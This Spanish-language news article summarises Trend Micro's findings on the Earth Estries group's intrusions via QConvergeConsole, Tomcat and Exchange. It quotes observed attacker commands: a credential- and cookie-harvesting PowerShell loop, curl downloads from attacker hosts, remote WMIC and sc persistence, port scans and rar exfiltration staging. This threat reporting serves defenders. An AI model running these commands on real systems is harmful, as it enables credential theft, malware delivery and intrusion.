Earth Estries: Trend Micro revela las sofisticadas artimañas de los hackers invisibles

Trend Micro ha detallado dos campañas de hackeo a gran escala llevadas a cabo por el grupo Earth Estries. Los atacantes emplearon técnicas avanzadas para infiltrarse en sistemas corporativos a través de vulnerabilidades en software ampliamente utilizado.

El primer esquema de ataque se centró en la explotación de QConvergeConsole, una herramienta para gestionar adaptadores de fibra óptica QLogic. Una vez obtenida la entrada inicial, los hackers usaron utilidades como PsExec y WMIC para propagar el malware en la red.

Los investigadores notaron que los atacantes explotaron vulnerabilidades o configuraciones incorrectas en QConvergeConsole a través de un agente de aplicación remota instalado (c:\program files\qlogic corporation\nqagent\netqlremote.exe), que permitía realizar escaneos de red e instalar Cobalt Strike en máquinas objetivo.

En otro caso, el grupo explotó una vulnerabilidad en Apache Tomcat6, que venía con QConvergeConsole (c:\program files (x86)\qlogic corporation\qconvergeconsole\tomcat-x64\apache-tomcat-6.0.35\bin\tomcat6.exe), para moverse lateralmente y gestionar herramientas en las etapas finales del ataque.

El grupo también usó activamente varios backdoors para persistir en el sistema. Entre ellos se encuentran Cobalt Strike, Trillclient, Hemigate y una nueva muestra denominada Crowdoor. El malware se entregaba en las máquinas comprometidas en forma de archivos CAB.

Una herramienta destacada fue Trillclient, que robaba credenciales del caché de los navegadores. Con su ayuda, los atacantes obtenían un control adicional sobre los sistemas comprometidos. Earth Estries demostró un profundo conocimiento de la infraestructura de las víctimas, descargando directamente documentos desde almacenes web internos mediante el comando wget.

Trillclient ejecutaba un script de PowerShell para recolectar perfiles de usuarios:

foreach($win_user_path in $users_path){

echo D | xcopy "C:\Users\$win_user_path\AppData\Roaming\Microsoft\Protect" "$copy_dest_path\$win_user_path\Protect" /E /C /H;

attrib -a -s -r -h "$copy_dest_path\$win_user_path\*" /S /D;

echo F | xcopy "C:\Users\$win_user_path\AppData\Local\Google\Chrome\User Data\Local State" "$copy_dest_path\$win_user_path\Local State" /C;

echo F | xcopy "C:\Users\$win_user_path\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies" "$copy_dest_path\$win_user_path\Default\Network\Cookies" /C;

echo F | xcopy "C:\Users\$win_user_path\AppData\Local\Google\Chrome\User Data\Default\Login Data" "$copy_dest_path\$win_user_path\Default\Login Data" /C;

}

En el segundo esquema de ataque, los hackers explotaron vulnerabilidades en Microsoft Exchange. Se instalaba un web shell llamado ChinaCopper en los servidores, a través del cual los atacantes desplegaban Cobalt Strike y otras herramientas para moverse lateralmente por la red.

Los componentes clave de esta cadena fueron los backdoors Zingdoor y SnappyBee (también conocido como Deed RAT). El malware se descargaba desde servidores de control o mediante solicitudes curl a sitios controlados por los hackers. Ejemplos típicos de comandos para descargar herramientas eran:

curl -o c:\windows\ime\imejp\VXTR hxxp://96[.]44[.]160[.]181/VXTR.txt

curl -k -o C:\programdata\UNBCL.dll hxxp://mail.ocac.org[.]pk/UNBCL.docx

curl -k -o C:\programdata\portscan.exe hxxp://mail.ocac.org[.]pk/Portscan.docx

A diferencia del primer esquema, aquí se enfatizó la explotación de Exchange y la actualización constante del malware para evitar su detección. El grupo utilizó activamente PortScan para mapear redes, mientras que otros backdoors ayudaban a recopilar y exportar documentos en archivos RAR.

Earth Estries ponía especial énfasis en permanecer ocultos en las redes de sus víctimas. Actualizaban regularmente sus herramientas y eliminaban versiones antiguas del malware. El uso prolongado en las redes comprometidas se aseguraba mediante diversos backdoors personalizados, incluido el recientemente descubierto Crowdoor, que interactuaba con Cobalt Strike.

Para persistir en los sistemas, los atacantes emplearon diversos métodos para crear tareas programadas, incluida la creación remota mediante WMIC:

wmic /node:<IP> /user:<domain>\<user> /password:***** process call create "schtasks /run /tn microsoft\sihost"

Los investigadores descubrieron varias técnicas empleadas por el grupo. Además del robo de credenciales mediante Trillclient, los hackers ocultaban el tráfico de comandos a través de proxys locales y remotos.

Para la exploración de la infraestructura de red, se utilizaron PortScan y scripts especializados. Tras descargar la utilidad PortScan, los atacantes escaneaban la red en busca de puertos abiertos 80, 443, 445 y 3389:

cmd.exe /c "C:\programdata\portscan.exe 172.xx.xx.0/24 445,3389,80,443"

cmd.exe /c "C:\programdata\portscan.exe 172.xx.xx.0/24 445,3389,80,443 >1.log"

Los datos recopilados se empaquetaban en archivos RAR cifrados y se subían a través de intercambiadores de archivos anónimos. Ejemplos de comandos para la recopilación de datos:

rar.exe a -m5 <install path>\his231.rar "C:\Users\<username>\AppData\Local\Google\Chrome\User Data\Default\History"

rar.exe a <install path>\0311.rar C:\users\<user name>\Desktop\* C:\users\<user name>\Downloads\* C:\users\<user name>\Documents\* -r -y -ta<cutoff date>

Durante la investigación se descubrieron otros backdoors adicionales: FuxosDoor y Cryptmerlin. FuxosDoor funcionaba como un backdoor para el servidor web IIS, proporcionando comunicación oculta con los servidores de comando y control. Cryptmerlin utilizaba la técnica de DLL sideloading para mantener un control prolongado de las máquinas infectadas.

Zingdoor y SnappyBee funcionaban como backdoors HTTP, facilitando el movimiento lateral por la red. SnappyBee es un backdoor modular, considerado sucesor de ShadowPad. Ambos malwares usaban el mecanismo de DLL sideloading para infiltrarse en procesos legítimos.

A través del web shell ChinaChopper, los atacantes creaban servicios remotos para elevar privilegios y asegurar la persistencia:

sc \\{hostname} create VGAuthtools type= own start= auto binpath= "c:\windows\microsoft.net\Framework\v4.0.30319\Installutil.exe C:\Programdata\VMware\vmvssrv.exe"

El nuevo backdoor Crowdoor, observado en la primera cadena de ataques, amplió las capacidades del grupo para reinstalar y actualizar Cobalt Strike en sistemas comprometidos. Ejecutaba diversas acciones según los argumentos recibidos, incluyendo la configuración de persistencia a través del registro o servicios.

El web shell ChinaCopper utilizado en el segundo esquema proporcionaba control remoto sobre los servidores Exchange comprometidos y servía como punto de partida para una mayor penetración en la red.

Los expertos recomiendan encarecidamente a las organizaciones corregir las vulnerabilidades en los servicios expuestos, especialmente en aplicaciones ampliamente utilizadas como servidores de correo y consolas de gestión.